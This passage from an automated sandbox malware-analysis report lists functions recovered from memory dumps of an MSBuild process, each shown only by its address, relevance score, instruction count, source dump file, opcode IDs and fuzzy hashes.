                                    • Instruction Fuzzy Hash: 98212A74740209CFDB54EF78C568AADB7F5BF89250B100468E506EB3A4EB31DD04CBA1
                                    Function 014FD006 Relevance: .1, Instructions: 68COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308434135.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_14fd000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0c37dac94cbd3a5f429c8cee30d0b4304ebf80e9c9445a0a74701077dff69768
                                    • Instruction ID: 2d403f80d9f110ed19f1cca323b2f976535c9c3216127a501fc281ad5db4b229
                                    • Opcode Fuzzy Hash: 0c37dac94cbd3a5f429c8cee30d0b4304ebf80e9c9445a0a74701077dff69768
                                    • Instruction Fuzzy Hash: 38216B755093C08FDB03CF64C994715BF71AF46214F29C5EBD9898F2A3C23A980ACB62
                                    Function 01560838 Relevance: .1, Instructions: 63COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: af13a5a8ca78cee2ba8df0655736108afbae8fdb74d584f6aef213513eac97a1
                                    • Instruction ID: 29d70ad21b9175e8fcfbe9f5e1f79d9b66858e8e6c321d0fa7b3b3e3ad8b0565
                                    • Opcode Fuzzy Hash: af13a5a8ca78cee2ba8df0655736108afbae8fdb74d584f6aef213513eac97a1
                                    • Instruction Fuzzy Hash: 48119D30B003058FDF669A7C941436E37A9FB81224F10497BE446CF2D6EA24CC468BD1
                                    Function 01560848 Relevance: .1, Instructions: 62COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4afa43ebb01b425386508cfc5774efc48a1730bcce1de1823073a7d0ac66138c
                                    • Instruction ID: 639d34b3bf08405c392f8d129cbdcf0d7f9d31c394173838dfc554fbf0b5c3a7
                                    • Opcode Fuzzy Hash: 4afa43ebb01b425386508cfc5774efc48a1730bcce1de1823073a7d0ac66138c
                                    • Instruction Fuzzy Hash: 31118F30B402048FDF66EA7DD55472E769EFB85264F10497AF006CF2D6EA24DC458BD1
                                    Function 015617C8 Relevance: .1, Instructions: 60COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ff7cdb78cf0e501d16203f7dfb5467dc45eafd6a19222e4c6e6a27efe58e0012
                                    • Instruction ID: f19c0fb936fc040feabbe2f0fb0a61e951fe62ecb1edc5537802045fed7ebea9
                                    • Opcode Fuzzy Hash: ff7cdb78cf0e501d16203f7dfb5467dc45eafd6a19222e4c6e6a27efe58e0012
                                    • Instruction Fuzzy Hash: 7611A375F003129FCB20AB7898546AE7BE5FFC8264F114439E91ADB308E735C8028BD1
                                    Function 01561492 Relevance: .1, Instructions: 59COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 83f15d092832f8b2f812a56140c604a5015a53d26a0823795d2363ea47aa8fc9
                                    • Instruction ID: f9676041d1292f4959d2b4d485fb6a039ec7d8f8441222f67d046dbf74ccb473
                                    • Opcode Fuzzy Hash: 83f15d092832f8b2f812a56140c604a5015a53d26a0823795d2363ea47aa8fc9
                                    • Instruction Fuzzy Hash: 95113A31B017168FCB65EFBC94901AEBBE8BFD9221B15047AE405EB241E736D842CBD1
                                    Function 015614A0 Relevance: .1, Instructions: 53COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1684e73cd9fed084d3b6022871124df7cf5d1dbe1f4c335264d801fcd01cf771
                                    • Instruction ID: 635a758205749451460fd1e5537154bbaad2dd70c5b1afd665c4476ce8e192d7
                                    • Opcode Fuzzy Hash: 1684e73cd9fed084d3b6022871124df7cf5d1dbe1f4c335264d801fcd01cf771
                                    • Instruction Fuzzy Hash: 9E012171A016168FCF25EFBD84901ADBBE9BB98211B150479E805EF241E635D941CBD1
                                    Function 0156A6D2 Relevance: .0, Instructions: 50COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c3b74a6c6a38e1f01813ba73e9b1da037649d866497c6a086894722936389f84
                                    • Instruction ID: 83f4fbe4690611da1e655e41f0e01ca6e889a55b6c4dd0415fd0c7fab6257b4f
                                    • Opcode Fuzzy Hash: c3b74a6c6a38e1f01813ba73e9b1da037649d866497c6a086894722936389f84
                                    • Instruction Fuzzy Hash: C001D631A002058BCB14DF59D984B8EBBBAFF90711F548178D8481F25AEB74ED45CBE1
                                    Function 01568F20 Relevance: .0, Instructions: 42COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 17b46f989f9da5854940948bf4bd1647586dbeb72b38157934e23dd4bda9320f
                                    • Instruction ID: 884adb133ad4e6a51731b686fdfad2469d17a7502ae42856a6c11c7afb170fd0
                                    • Opcode Fuzzy Hash: 17b46f989f9da5854940948bf4bd1647586dbeb72b38157934e23dd4bda9320f
                                    • Instruction Fuzzy Hash: E10121B5A4010DDFCB06EFB4F99499C7BB5EF40304F4041B9C4089B269EA356E0A8B91
                                    Function 01567EC0 Relevance: .0, Instructions: 34COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 13969efc7f25d19c8e9133a70b1746c362cdbad2e02c3b64603cd10ffdd4c2b4
                                    • Instruction ID: 58e4d55212bc1bd5f693e566ba5a1f696d331033ccf28065f8b58075705b5d65
                                    • Opcode Fuzzy Hash: 13969efc7f25d19c8e9133a70b1746c362cdbad2e02c3b64603cd10ffdd4c2b4
                                    • Instruction Fuzzy Hash: 56F0C435B401188FCB14EB64D5A8AAC77B2EF88219F5540A8E50A9F3A4DB35AD46CB41
                                    Function 01568F30 Relevance: .0, Instructions: 33COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b709eaab2d0d115824a0c5107da30fadf1163803f19728e483ef7e678e4b8b76
                                    • Instruction ID: 6ebf5c0cd5b084e61cc88b1dddcc4496003eebf47116708c456a1940fe4d0ba7
                                    • Opcode Fuzzy Hash: b709eaab2d0d115824a0c5107da30fadf1163803f19728e483ef7e678e4b8b76
                                    • Instruction Fuzzy Hash: BEF031B494010EDFCB06FFB4FA9499D7BB9EF40304F5046B9C0049B268EB316E098B91

                                    Non-executed Functions

                                    Function 068B5670 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3312468095.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_68b0000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                    • API String ID: 0-2843079600
                                    • Opcode ID: f95f572602a01e9a9965d39e23a0f73b5c23eedbfb05c6d034548f0cbf783e53
                                    • Instruction ID: 5bb1a5be407c8c71997774b31e404dd4e04e37b8ba33a31804fb363c359b455f
                                    • Opcode Fuzzy Hash: f95f572602a01e9a9965d39e23a0f73b5c23eedbfb05c6d034548f0cbf783e53
                                    • Instruction Fuzzy Hash: 3A121B30E00219CFDB68DF69C894A9EB7F6BF88304F209569D509AB364DB349D45CF81
                                    Function 068B3CC0 Relevance: 2.9, Strings: 2, Instructions: 414COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3312468095.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_68b0000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: XPbq$\Obq
                                    • API String ID: 0-409418754
                                    • Opcode ID: 63e0d5e059b8c3164af4a77604b96b6b7bd7da16e8fa7ac2d75620149d74ae49
                                    • Instruction ID: 901ad32bb9ff5d7ee9fd79d7cd0925428c87e64b3bf28a4b5079461e9ce9fddf
                                    • Opcode Fuzzy Hash: 63e0d5e059b8c3164af4a77604b96b6b7bd7da16e8fa7ac2d75620149d74ae49
                                    • Instruction Fuzzy Hash: 7BD11431B101158FCB64DF68D494AAEBBF2FF88710F25946AE546DB3A5CA71DC01CB90
                                    Function 0156E0ED Relevance: 2.0, Instructions: 1956COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: edbc115210a48dc19282a653fe551da1d06a384ee2bed5a91c59a62239cf3a45
                                    • Instruction ID: 0bdb3d8cb7b1967c7f075e4ad7db34a3867eaa3db96b4ec2f66a01b39a4a94e0
                                    • Opcode Fuzzy Hash: edbc115210a48dc19282a653fe551da1d06a384ee2bed5a91c59a62239cf3a45
                                    • Instruction Fuzzy Hash: 8C230C31D10B198ECB11EF68C8945ADF7B5FF99300F15C79AE458AB121EB70AAC5CB81
                                    Function 068BC370 Relevance: 1.8, Strings: 1, Instructions: 573COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3312468095.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_68b0000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: PH]q
                                    • API String ID: 0-3168235125
                                    • Opcode ID: 4a94373e9b847252f394daeedac078325abc8ae847beaab7d062ffae55ba0a90
                                    • Instruction ID: a1c01b70c3a30bf53ce0ee129f9480838f89f58837c18aea800eaa6e029070b1
                                    • Opcode Fuzzy Hash: 4a94373e9b847252f394daeedac078325abc8ae847beaab7d062ffae55ba0a90
                                    • Instruction Fuzzy Hash: B922CE30B001098FCB54DF68D494AAEB7F6EF89310F20946AE106DB3A5DB75EC45CB91
                                    Function 015641D0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3308920828.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_1560000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: \V%m
                                    • API String ID: 0-324988934
                                    • Opcode ID: 83aad5c864cd4f4df53bc14a383e0b9835321bfa0239cd02168637b4ccb60e6c
                                    • Instruction ID: 9d222434ee226eb87e5ffff8e8cf59a0c488b4a51da6e3bb1a5acf438732d0a1
                                    • Opcode Fuzzy Hash: 83aad5c864cd4f4df53bc14a383e0b9835321bfa0239cd02168637b4ccb60e6c
                                    • Instruction Fuzzy Hash: D3B16D70E00209CFDF14CFADD9857AEBBF6BF88314F148129D419AB294EB749885CB81
                                    Function 06A0A198 Relevance: .3, Instructions: 264COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.3312733553.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_6a00000_MSBuild.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 77e2826b2dc9d1f34e7a5eca13e790227f340b9b1177b61e5c08a01ef6aa10ca
                                    • Instruction ID: cf453d4c172ceb50d285937fb1398e7725392761287f3a9213bc39be35bec3dc
                                    • Opcode Fuzzy Hash: 77e2826b2dc9d1f34e7a5eca13e790227f340b9b1177b61e5c08a01ef6aa10ca
                                    • Instruction Fuzzy Hash: 1DA17132E003058FDF45EFB5D94459EB7B2FF89300B15416AEA16AF262DB35E945CB80